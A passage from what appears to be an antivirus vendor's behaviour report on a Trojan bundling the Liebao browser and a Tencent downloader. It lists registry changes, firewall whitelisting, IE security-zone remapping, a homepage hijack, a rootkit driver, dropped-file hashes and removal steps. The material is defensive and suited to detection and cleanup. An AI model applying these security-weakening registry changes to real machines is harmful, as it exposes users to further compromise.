[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B2 D9 13 7E 78 4F 19 0C 9D 6E 39 7A 0B 14 D6 07"
The process tencentdl.exe:1932 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"regsvr32.exe" = "Microsoft(C) Register Server"
[HKCR\CLSID\{70DE12EA-79F4-46bc-9812-86DB50A2FD64}]
"AppID" = "{51BEE30D-EEC8-4BA3-930B-298B8E759EB1}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCR\CLSID\{70DE12EA-79F4-46bc-9812-86DB50A2FD64}]
"(Default)" = "Downloader Class"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCR\Interface\{E7270EC6-0113-4A78-B610-E501D0A9E48E}\ProxyStubClsid32]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"
[HKCR\TypeLib\{DA624F8F-98BF-4B03-AD11-A12D07119E81}\1.0\0\win32]
"(Default)" = "c:\program files\common files\tencent\qqdownload\122\tencentdl.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\TypeLib]
"(Default)" = "{DA624F8F-98BF-4B03-AD11-A12D07119E81}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCR\DownloadProxy.Downloader.1]
"(Default)" = "Downloader Class"
[HKCR\DownloadProxy.Downloader.1\CLSID]
"(Default)" = "{70DE12EA-79F4-46bc-9812-86DB50A2FD64}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCR\DownloadProxy.Downloader]
"(Default)" = "Downloader Class"
[HKCR\CLSID\{70DE12EA-79F4-46bc-9812-86DB50A2FD64}\LocalServer32]
"(Default)" = "c:\program files\common files\tencent\qqdownload\122\tencentdl.exe"
[HKCR\Interface\{E7270EC6-0113-4A78-B610-E501D0A9E48E}\ProxyStubClsid]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{70DE12EA-79F4-46bc-9812-86DB50A2FD64}\VersionIndependentProgID]
"(Default)" = "DownloadProxy.Downloader"
[HKCR\AppID\{51BEE30D-EEC8-4BA3-930B-298B8E759EB1}]
"(Default)" = "DownloadProxy"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCR\DownloadProxy.Downloader\CurVer]
"(Default)" = "DownloadProxy.Downloader.1"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"netsh.exe" = "Network Command Shell"
[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\TypeLib]
"Version" = "1.0"
[HKCR\Interface\{E7270EC6-0113-4A78-B610-E501D0A9E48E}\TypeLib]
"Version" = "1.0"
[HKCR\CLSID\{70DE12EA-79F4-46bc-9812-86DB50A2FD64}\ProgID]
"(Default)" = "DownloadProxy.Downloader.1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
[HKCR\AppID\DownloadProxy.EXE]
"AppID" = "{51BEE30D-EEC8-4BA3-930B-298B8E759EB1}"
[HKCR\TypeLib\{DA624F8F-98BF-4B03-AD11-A12D07119E81}\1.0\HELPDIR]
"(Default)" = ""
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6E 83 76 56 7D 6B AB BB 78 B0 56 59 90 A3 B3 2A"
[HKCR\CLSID\{70DE12EA-79F4-46bc-9812-86DB50A2FD64}\TypeLib]
"(Default)" = "{DA624F8F-98BF-4B03-AD11-A12D07119E81}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCR\Interface\{E7270EC6-0113-4A78-B610-E501D0A9E48E}\TypeLib]
"(Default)" = "{DA624F8F-98BF-4B03-AD11-A12D07119E81}"
[HKCR\Interface\{E7270EC6-0113-4A78-B610-E501D0A9E48E}]
"(Default)" = "_IDownloaderEvents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKCR\TypeLib\{DA624F8F-98BF-4B03-AD11-A12D07119E81}\1.0]
"(Default)" = "DownloadProxy 1.0 Type Library"
[HKCR\TypeLib\{DA624F8F-98BF-4B03-AD11-A12D07119E81}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\DownloadProxy.Downloader\CLSID]
"(Default)" = "{70DE12EA-79F4-46bc-9812-86DB50A2FD64}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}]
"(Default)" = "IDownloader"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process netsh.exe:320 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"BitNames" = " NAP_TRACE_BASE NAP_TRACE_NETSH"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"Guid" = "710adbf0-ce88-40b4-a50d-231ada6593f0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"Guid" = "b0278a28-76f1-4e15-b1df-14b209a12613"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "37 3F 4A 72 9A DC FA 0A 01 00 1C 3E 3C 8A 6E 11"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
Adds a rule to the firewall Windows which allows any network activity:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\Common Files\Tencent\QQDownload\122]
"Tencentdl.exe" = "%Program Files%\Common Files\Tencent\QQDownload\122\Tencentdl.exe:*:Enabled:腾讯产å“ÂÂ下载组件"
The Trojan adds process executable file it works in to the list of trusted Windows Firewall applications:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Program Files%\Common Files\Tencent\QQDownload\122]
"Tencentdl.exe" = "%Program Files%\Common Files\Tencent\QQDownload\122\Tencentdl.exe:*:Enabled:腾讯产å“ÂÂ下载组件"
The process ÊÖ»úºäÕ¨»ú.exe:652 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E0 28 CD B6 37 93 88 58 0C C4 FB 54 CE C4 7E B1"
[HKCU\Software\Microsoft\Multimedia\DrawDib]
"vga.drv 1276x846x32(BGR 0)" = "31,31,31,31"
The process Tencentdl.exe:848 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "91 8A 46 BD AD 74 4B 18 7B 8D 9E 0F 64 E3 B4 8C"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\c:\program files\common files\tencent\qqdownload\122]
"Tencentdl.exe" = "腾讯高速下载引擎"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process 0liebao.exe:1948 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C2 5E 11 0A 94 ED 82 8C 63 55 9A F5 D3 84 B6 3B"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Local Settings\Temp\1.tmp]
"setup.bat" = "setup"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process knbcenter.exe:2036 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B6 A6 0F C5 90 88 5E B1 BD 69 7A B6 B3 AC 3C BB"
[HKLM\System\CurrentControlSet\Services\knbcenter]
"ImagePath" = "%Program Files%\liebao\4.5.34.6725\KNBCenter.exe"
The process knbcenter.exe:916 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3C 40 9D 2C 07 E4 E8 E4 43 9E CD 86 9F D7 31 A8"
[HKLM\System\CurrentControlSet\Services\knbcenter]
"Description" = "猎豹æµÂÂ览器主动防御(BIPS)åŠ安全组件更新æœÂÂ务,帮助çâ€Â¨æˆ·é˜²å¾¡æœ€æ–°æœ¨é©¬ã€‚"
The process reg.exe:1976 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "48 5F 5F B3 0D 3F F8 A8 6E B0 5B 81 DC CB 5B 53"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Default_Page_URL" = "http://www.duba.com/?un_4_413286"
The process reg.exe:708 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A4 C1 6E 85 4B FB D3 D0 94 EE 9F FA 4A 47 37 98"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page" = "http://www.duba.com/?un_4_413286"
The process skinupdater.exe:348 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A5 19 E1 6D DD B4 03 1E 75 C0 04 D6 8C 8B 13 D2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
Dropped PE files
MD5 | File path |
---|---|
2aa21c79b5dd2b5152d49f5825c87388 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\0liebao.exe |
143f817034ae745c8225c424fa944f43 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\1.tmp\down_s_66_82685.exe |
b209163d6c82ef393c15c02ed206bbc4 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\ÊÖ»úºäÕ¨»ú.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
Using the driver "%System%\drivers\KNBDrv.sys" the Trojan controls creation and closing of processes by installing the process notifier.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager):
ksbinstaller_66_82685.exe:984
%original file name%.exe:1264
KNBCenter.exe:1240
regsvr32.exe:1536
liebao.exe:1780
liebao.exe:516
down_s_66_82685.exe:1988
ping.exe:972
wuauclt.exe:924
tencentdl.exe:1932
netsh.exe:320
Tencentdl.exe:848
0liebao.exe:1948
knbcenter.exe:2036
knbcenter.exe:916
reg.exe:1976
reg.exe:708
skinupdater.exe:348 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\send_ba0.gz (586 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\kae\kaearchb.dat (6341 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\ztma002d.psg (74 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\kae\kaecore.ini (172 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\knbpolicy.dll (15628 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\img\alipay.png (2 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\img\baifubao.png (6 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\atxhlp.dat (21 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\xinput1_3.dll (880 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\kdumprep.exe (7541 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\毒霸网å€大全.lnk (1 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\bepb3002.ksg (8 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\kseutil.dll (2976 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\oj021204.fsg (262 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\ztvb0005.vsg (263 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\unknown.ksg (422 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\libvideo.dat (15 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\img\safesearch_unsafe.png (3 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\img\bc.png (3 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\vinfo.ini (833 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\img\spdb.png (2 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\zepbb002.ksg (1 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\kae\kaevname.dat (108 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\ksedset.ini (425 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\zepc0002.ksg (1 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\btvb7001.vsg (265 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\猎豹安全æµÂÂ览器\ä¿®å¤ÂÂæµÂÂ览器.lnk (748 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\chrome.dll (503987 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\ztvb0002.vsg (263 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\cdeploy.dat (11 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\Localauto.db (40 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\false.psg (132 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\PepperFlash\manifest.json (2 bytes)
%System%\drivers\ksapi.sys (601 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\KNBDrv64.sys (1543 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\img\99bill.png (2 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\qqdl\Install.bat (24 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\plugins\npaliedit.dll (2836 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\gare.db (66 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\oj011204.fsg (262 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\ztvb7001.vsg (263 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\bepb3001.ksg (92 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\qqdl\Extract.dll (3773 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\incognito.dat (1650 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\zepba000.ksg (1 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\btvb7999.vsg (266 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\kmsgsvc.dll (8953 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\bepac002.ksg (3702 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\PresetExtensions\nffflelpnjalbndohecponhmlcihbgeo\1.0\skin_thumbnail.png (5 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\kae\karchive.dat (101 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\bepb6001.ksg (2 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\img\boc.png (2 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\kae\kaext2.dat (85 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\skinupdater.exe (21987 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\autofilljs2.dat (89 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\FixBrowser.exe (18429 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\PresetExtensions\Preferences (2 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\adfilter.dat (131 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\ztfb0002.fsg (288 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\kui.pak (30655 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\ztvba012.vsg (273 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\locales\en-US.pak (195 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\kBrowserUpgrade2.dll (2787 bytes)
%Documents and Settings%\%current user%\Desktop\猎豹安全æµÂÂ览器.lnk (634 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\falset.fsg (120 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\ksecfg.ini (1 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\img\psbc.png (3 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\zema0007.psg (68 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\lego.dat (1 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\befc2009.psg (82 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\ztmb0014.psg (68 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\ksbwdet2.dll (10359 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\p1tl.dat (6 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\mousegesturelib.xml (2 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\猎豹安全æµÂÂ览器\å¸载猎豹安全æµÂÂ览器.lnk (726 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\zipb0003.ksg (2 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\newtab_img2.zip (7972 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\nologin.dat (897 bytes)
